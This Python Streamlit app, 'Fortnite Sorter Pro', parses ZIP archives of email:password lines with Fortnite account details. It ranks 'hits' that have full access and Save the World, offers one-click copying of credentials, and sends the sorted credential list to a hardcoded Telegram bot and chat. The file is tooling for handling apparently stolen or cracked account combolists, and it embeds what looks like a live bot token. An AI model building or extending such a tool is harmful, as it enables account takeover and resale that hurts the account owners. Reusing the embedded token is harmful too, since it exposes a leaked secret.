import os
import re
from collections import defaultdict
import csv
from datetime import datetime
import zipfile
import tempfile
import streamlit as st
import json
import requests
import io
import shutil
import streamlit.components.v1 as components

# --- Configuration ---
DEFAULT_TG_TOKEN = "8320526788:AAECI8pPkEqUOEV3JaAz8VEVoLDKfnY2BCY"
DEFAULT_CHAT_ID = "-1003446261251"

# Set page config
st.set_page_config(
    page_title="Fortnite Sorter Pro",
    page_icon="🎮",
    layout="wide",
    initial_sidebar_state="expanded"
)

# --- State Management ---
if 'processed_accounts' not in st.session_state:
    st.session_state.processed_accounts = None
if 'stats' not in st.session_state:
    st.session_state.stats = None

# --- Telegram Functions ---
def send_telegram_message(token, chat_id, message):
    url = f"https://api.telegram.org/bot{token}/sendMessage"
    payload = {"chat_id": chat_id, "text": message, "parse_mode": "Markdown"}
    try:
        response = requests.post(url, json=payload, timeout=10)
        return response.json()
    except Exception as e:
        return {"ok": False, "description": str(e)}

def send_telegram_document(token, chat_id, file_buffer, filename, caption=""):
    url = f"https://api.telegram.org/bot{token}/sendDocument"
    data = {"chat_id": chat_id, "caption": caption}
    file_buffer.seek(0)
    files = {"document": (filename, file_buffer, "text/plain")}
    try:
        response = requests.post(url, data=data, files=files, timeout=30)
        return response.json()
    except Exception as e:
        return {"ok": False, "description": str(e)}

# --- Parser Logic (ADAPTED FROM YOUR OLD SCRIPT) ---
class FortniteAccountParser:
    def __init__(self):
        self.accounts = defaultdict(dict)
        self.stats = {
            "total_accounts": 0, "total_vbucks": 0, "fa_yes": 0, "stw_yes": 0,
            "hit_accounts": 0, "total_skins": 0, "total_matches": 0
        }

    def normalize_bool(self, value):
        if isinstance(value, str):
            lower = value.lower()
            return 'Yes' if lower in ('yes', 'true', '1') else 'No'
        return 'Yes' if value else 'No'

    def parse_line(self, line):
        line = line.strip()
        # Skip invalid lines
        if not line or line.startswith('#') or 'generated by' in line.lower() or '====' in line:
            return None
        
        account = {}
        
        # 1. Extract Email:Pass (Using Regex from your script)
        # Looks for email:pass at the START of the line
        email_pass_match = re.match(r'([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+):([^|\s]+)', line)
        if not email_pass_match:
            return None
            
        account['email'] = email_pass_match.group(1).strip()
        account['password'] = email_pass_match.group(2).strip()
        
        # 2. Get the rest of the line to parse stats
        remaining = line[email_pass_match.end():].strip()
        
        # --- PARSING HELPERS ---
        def extract_val(regex, group_index=1, default='No'):
            m = re.search(regex, remaining, re.IGNORECASE)
            return self.normalize_bool(m.group(group_index)) if m else default

        def extract_int(regex, group_index=1):
            m = re.search(regex, remaining, re.IGNORECASE)
            return int(m.group(group_index).replace(',', '')) if m else 0

        def extract_str(regex, group_index=1):
            m = re.search(regex, remaining, re.IGNORECASE)
            return m.group(group_index).strip() if m else 'Unknown'

        # --- EXTRACT DATA USING YOUR OLD SCRIPT'S PATTERNS ---
        
        # FA / 2FA / STW
        account['fa'] = extract_val(r'FA:\s*(Yes|No|True|False|1|0)')
        account['twofa'] = extract_val(r'2FA:\s*(Yes|No|True|False|1|0)')
        account['stw'] = extract_val(r'STW:\s*(Yes|No|True|False|1|0)')
        
        # V-Bucks (Updated to handle commas just in case, e.g. 1,200)
        # Matches: Vbucks Count: 1200 OR V-Bucks: 1200
        account['vbucks'] = extract_int(r'(?:Vbucks Count|V-Bucks|Vbucks):\s*([\d,]+)')
        
        # --- SKINS (CRITICAL FIX) ---
        # 1. Count: Looks for "Skins: [25]"
        skins_count_match = re.search(r'Skins:\s*\[(\d+)\]', remaining)
        account['skins'] = int(skins_count_match.group(1)) if skins_count_match else 0
        
        # 2. Names: Looks for "Skins: [25]: Name1, Name2"
        # The key missing part in previous versions was handling the `[N]:` structure correctly
        skins_names_match = re.search(r'Skins:\s*\[\d*\]:\s*(.+?)(?=\s*\||$)', remaining)
        if skins_names_match:
            # Found standard format: Skins: [12]: A, B, C
            account['skin_names'] = [name.strip() for name in skins_names_match.group(1).split(',')]
        else:
            # Fallback: Just "Skins: Name1, Name2" (rare but possible)
            # Only match if it DOESN'T start with a bracket
            fallback_match = re.search(r'Skins:\s*(?![\[])(.+?)(?=\s*\||$)', remaining)
            if fallback_match:
                names = [n.strip() for n in fallback_match.group(1).split(',')]
                # Filter out numbers just in case
                account['skin_names'] = [n for n in names if not n.isdigit()]
            else:
                account['skin_names'] = []

        # --- OTHER STATS ---
        account['last_played'] = extract_str(r'Last Played:\s*([^|]+)')
        account['username'] = extract_str(r'Username:\s*([^|]+)')
        account['matches_played'] = extract_int(r'Matches(?: Played)?:\s*(\d+)')
        account['level'] = extract_int(r'Level:\s*(\d+)')
        account['platform'] = extract_str(r'Platform:\s*([^|]+)')
        
        # Logic for HIT
        account['is_hit'] = (account['fa'] == 'Yes' and account['stw'] == 'Yes')
        
        return account

    def process_directory(self, root_dir):
        for root, _, files in os.walk(root_dir):
            for file in files:
                if file.endswith('.txt'):
                    try:
                        # errors='ignore' ensures weird symbols don't crash the regex
                        with open(os.path.join(root, file), 'r', encoding='utf-8', errors='ignore') as f:
                            for line in f:
                                p = self.parse_line(line)
                                if p:
                                    email = p['email']
                                    # Merge Logic: If account exists, keep the one with more skins/vbucks
                                    if email not in self.accounts:
                                        self.accounts[email] = p
                                    else:
                                        # Simple merge: if new one has skins and old one didn't, take new one
                                        if p['skins'] > self.accounts[email]['skins']:
                                            self.accounts[email] = p
                    except Exception:
                        pass
        
        # Calc Stats
        vals = self.accounts.values()
        self.stats['total_accounts'] = len(vals)
        self.stats['total_vbucks'] = sum(a['vbucks'] for a in vals)
        self.stats['hit_accounts'] = sum(1 for a in vals if a['is_hit'])
        self.stats['fa_yes'] = sum(1 for a in vals if a['fa'] == 'Yes')
        self.stats['total_skins'] = sum(a['skins'] for a in vals)
        
        return len(vals)

    def get_txt_string(self):
        output = io.StringIO()
        # Sort: Vbucks High -> Low
        sorted_accs = sorted(self.accounts.values(), key=lambda x: x['vbucks'], reverse=True)
        
        output.write(f"Generated by Fortnite Sorter Pro - {datetime.now().strftime('%Y-%m-%d %H:%M')}\n")
        output.write(f"Total Accounts: {len(sorted_accs)}\n")
        output.write("==================================================\n\n")
        
        for acc in sorted_accs:
            # Build the Skins string
            if acc['skin_names']:
                skin_str = ", ".join(acc['skin_names'])
                # Format: Skins: [Count]: Name1, Name2 (Matching your old format style)
                skin_section = f"Skins: [{acc['skins']}]: {skin_str}"
            else:
                skin_section = f"Skins: [{acc['skins']}]"

            # Combine line
            line = (
                f"{acc['email']}:{acc['password']} | "
                f"Vbucks: {acc['vbucks']} | "
                f"FA: {acc['fa']} | "
                f"STW: {acc['stw']} | "
                f"Level: {acc['level']} | "
                f"{skin_section}"
            )
            output.write(line + "\n")
            
        return output.getvalue()

# --- COMPACT HTML/CSS View ---
def render_html_view(accounts_json):
    html = f"""
    <!DOCTYPE html>
    <html>
    <head>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;600;700&display=swap');
        :root {{
            --bg: #0e1117; --card-bg: #1a1c24; --border: #2d2f36; 
            --accent: #FF4B4B; --text: #e0e0e0; --muted: #858585;
            --green: #22c55e; --red: #ef4444; --blue: #3b82f6; --gold: #eab308;
        }}
        body {{ background: transparent; color: var(--text); font-family: 'Inter', sans-serif; margin: 0; font-size: 14px; }}
        
        /* Compact Controls */
        .controls {{ display: flex; gap: 8px; margin-bottom: 15px; flex-wrap: wrap; }}
        .btn {{
            background: var(--card-bg); border: 1px solid var(--border); color: var(--text);
            padding: 6px 12px; border-radius: 6px; cursor: pointer; font-size: 0.85em; font-weight: 600;
            transition: all 0.2s; display: flex; align-items: center; gap: 6px;
        }}
        .btn:hover, .btn.active {{ border-color: var(--accent); color: var(--accent); background: rgba(255, 75, 75, 0.1); }}
        
        /* Grid - Wider Cards to fit data */
        .grid {{ 
            display: grid; 
            grid-template-columns: repeat(auto-fill, minmax(380px, 1fr)); 
            gap: 12px; 
        }}
        
        /* Compact Card */
        .card {{
            background: var(--card-bg); border: 1px solid var(--border); border-radius: 8px;
            padding: 12px; position: relative; transition: transform 0.1s;
            display: flex; flex-direction: column; gap: 8px;
        }}
        .card:hover {{ border-color: #444; }}
        
        /* Header: Vbucks + Email */
        .header {{ display: flex; justify-content: space-between; align-items: center; }}
        
        .vbucks {{ 
            font-size: 1.1em; font-weight: 700; color: var(--blue); 
            display: flex; align-items: center; gap: 5px;
        }}
        
        .email-box {{
            background: #00000040; padding: 4px 8px; border-radius: 4px; font-family: monospace;
            font-size: 0.9em; border: 1px solid #ffffff05; cursor: pointer; color: #ccc;
            max-width: 220px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis;
        }}
        .email-box:active {{ color: var(--accent); border-color: var(--accent); }}
        
        /* Stats Row - Compact */
        .stats-row {{ 
            display: flex; gap: 8px; 
            background: rgba(255,255,255,0.02); padding: 6px; border-radius: 5px;
        }}
        
        .stat {{ 
            flex: 1; text-align: center; display: flex; flex-direction: column; 
            border-right: 1px solid #ffffff05; 
        }}
        .stat:last-child {{ border-right: none; }}
        
        .stat-val {{ font-weight: 700; font-size: 0.9em; }}
        .stat-lbl {{ font-size: 0.7em; color: var(--muted); text-transform: uppercase; margin-top: 2px; }}
        
        .yes {{ color: var(--green); }}
        .no {{ color: var(--red); }}
        
        /* Skins Section */
        .skins-area {{
            font-size: 0.8em; color: var(--muted); 
            background: #00000020; padding: 6px; border-radius: 4px;
            min-height: 32px; max-height: 60px; overflow-y: auto; line-height: 1.3;
        }}
        
        /* Scrollbar for skins */
        .skins-area::-webkit-scrollbar {{ width: 4px; }}
        .skins-area::-webkit-scrollbar-thumb {{ background: #333; border-radius: 2px; }}
        
        .footer {{ display: flex; justify-content: space-between; font-size: 0.75em; color: #555; margin-top: 2px; }}
        
    </style>
    </head>
    <body>
        <div class="controls">
            <button class="btn active" onclick="filter('all', this)">All</button>
            <button class="btn" onclick="filter('hit', this)">🔥 HITs</button>
            <button class="btn" onclick="filter('fa', this)">🔓 FA</button>
            <button class="btn" onclick="filter('stw', this)">⚡ STW</button>
            <button class="btn" onclick="filter('1k', this)">💰 1k+</button>
            <div style="flex-grow:1; text-align:right; font-size:0.9em; color: #666; align-self:center;" id="count"></div>
        </div>
        
        <div class="grid" id="grid"></div>

        <script>
            let data = {accounts_json};
            data.sort((a, b) => b.vbucks - a.vbucks);
            
            const grid = document.getElementById('grid');
            const countLabel = document.getElementById('count');
            
            function render(items) {{
                grid.innerHTML = '';
                countLabel.innerText = items.length;
                
                if(items.length === 0) {{
                    grid.innerHTML = '<div style="grid-column:1/-1; text-align:center; padding:20px; color:#555;">No accounts found.</div>';
                    return;
                }}
                
                items.forEach(acc => {{
                    // Determine Colors
                    const faColor = acc.fa === 'Yes' ? 'yes' : 'no';
                    const stwColor = acc.stw === 'Yes' ? 'yes' : 'no';
                    
                    // Skins Text
                    let skinsTxt = "None";
                    if(acc.skin_names.length > 0) {{
                        // Join first few, add count
                        skinsTxt = acc.skin_names.join(", ");
                    }} else if (acc.skins > 0) {{
                        skinsTxt = `Count: ${{acc.skins}} (Names missing)`;
                    }}
                    
                    const card = document.createElement('div');
                    card.className = 'card';
                    card.innerHTML = `
                        <div class="header">
                            <div class="vbucks"><i class="fas fa-coins"></i> ${{acc.vbucks.toLocaleString()}}</div>
                            <div class="email-box" onclick="navigator.clipboard.writeText('${{acc.email}}:${{acc.password}}')">
                                ${{acc.email}}
                            </div>
                        </div>
                        
                        <div class="stats-row">
                            <div class="stat">
                                <div class="stat-val ${{faColor}}">${{acc.fa}}</div>
                                <div class="stat-lbl">FA</div>
                            </div>
                            <div class="stat">
                                <div class="stat-val ${{stwColor}}">${{acc.stw}}</div>
                                <div class="stat-lbl">STW</div>
                            </div>
                            <div class="stat">
                                <div class="stat-val" style="color:#fff">${{acc.skins}}</div>
                                <div class="stat-lbl">Skins</div>
                            </div>
                            ${{acc.level > 0 ? `
                            <div class="stat">
                                <div class="stat-val">${{acc.level}}</div>
                                <div class="stat-lbl">Lvl</div>
                            </div>` : ''}}
                        </div>
                        
                        <div class="skins-area" title="${{skinsTxt}}">
                            <i class="fas fa-tshirt" style="margin-right:4px; opacity:0.7;"></i> ${{skinsTxt}}
                        </div>
                        
                        <div class="footer">
                            <span>Matches: ${{acc.matches_played}}</span>
                            <span>${{acc.last_played}}</span>
                        </div>
                    `;
                    grid.appendChild(card);
                }});
            }}
            
            function filter(type, btn) {{
                document.querySelectorAll('.btn').forEach(b => b.classList.remove('active'));
                btn.classList.add('active');
                
                let res = data;
                if(type === 'hit') res = data.filter(a => a.fa === 'Yes' && a.stw === 'Yes');
                if(type === 'fa') res = data.filter(a => a.fa === 'Yes');
                if(type === 'stw') res = data.filter(a => a.stw === 'Yes');
                if(type === '1k') res = data.filter(a => a.vbucks >= 1000);
                
                render(res);
            }}
            
            render(data);
        </script>
    </body>
    </html>
    """
    return html

# --- Main App ---
def main():
    with st.sidebar:
        st.header("📲 Telegram Bot")
        tg_token = st.text_input("Bot Token", value=DEFAULT_TG_TOKEN, type="password")
        tg_chat_id = st.text_input("Chat ID", value=DEFAULT_CHAT_ID)
        
        st.markdown("---")
        if st.button("🔄 Reset App & Data"):
            st.session_state.clear()
            st.rerun()

    st.title("⚡ Fortnite Sorter Pro (Final Fix)")
    
    if st.session_state.processed_accounts is None:
        uploaded_file = st.file_uploader("📂 Upload ZIP file", type="zip")
        if uploaded_file and st.button("🚀 Process Accounts"):
            with st.spinner("Processing..."):
                temp_dir = tempfile.mkdtemp()
                try:
                    with zipfile.ZipFile(uploaded_file, 'r') as z:
                        z.extractall(temp_dir)
                    
                    parser = FortniteAccountParser()
                    parser.process_directory(temp_dir)
                    
                    st.session_state.processed_accounts = parser.accounts
                    st.session_state.stats = parser.stats
                except Exception as e:
                    st.error(f"Error: {e}")
                finally:
                    shutil.rmtree(temp_dir)
                    st.rerun()
    
    else:
        accounts = st.session_state.processed_accounts
        stats = st.session_state.stats
        
        c1, c2, c3 = st.columns([1, 1, 1])
        
        parser = FortniteAccountParser()
        parser.accounts = accounts
        txt_data = parser.get_txt_string()
        
        with c1:
            st.download_button(
                "💾 Download Results (TXT)",
                data=txt_data,
                file_name=f"Fortnite_Results_{datetime.now().strftime('%H%M')}.txt",
                mime="text/plain",
                use_container_width=True
            )
            
        with c2:
            if st.button("✈️ Send to Telegram", use_container_width=True):
                with st.spinner("Sending..."):
                    if tg_token and tg_chat_id:
                        msg = (
                            f"📊 *Fortnite Results*\n"
                            f"👤 Accounts: `{stats['total_accounts']}`\n"
                            f"🔥 Hits (FA+STW): `{stats['hit_accounts']}`\n"
                            f"💰 Total V-Bucks: `{stats['total_vbucks']:,}`\n"
                            f"👕 Total Skins: `{stats['total_skins']}`"
                        )
                        send_telegram_message(tg_token, tg_chat_id, msg)
                        buf = io.BytesIO(txt_data.encode('utf-8'))
                        res = send_telegram_document(tg_token, tg_chat_id, buf, "Results.txt")
                        
                        if res.get("ok"):
                            st.success("Sent!")
                        else:
                            st.error(f"Error: {res.get('description')}")
                    else:
                        st.error("Check Sidebar settings")
                        
        with c3:
             if st.button("🔙 New Upload", use_container_width=True):
                st.session_state.clear()
                st.rerun()

        # Stats
        m1, m2, m3, m4 = st.columns(4)
        m1.metric("Total Accounts", stats['total_accounts'])
        m2.metric("Total V-Bucks", f"{stats['total_vbucks']:,}")
        m3.metric("FA Only", stats['fa_yes'])
        m4.metric("Total Skins", stats['total_skins'])

        st.divider()
        
        acc_list = list(accounts.values())
        components.html(render_html_view(json.dumps(acc_list)), height=900, scrolling=True)

if __name__ == "__main__":
    main()
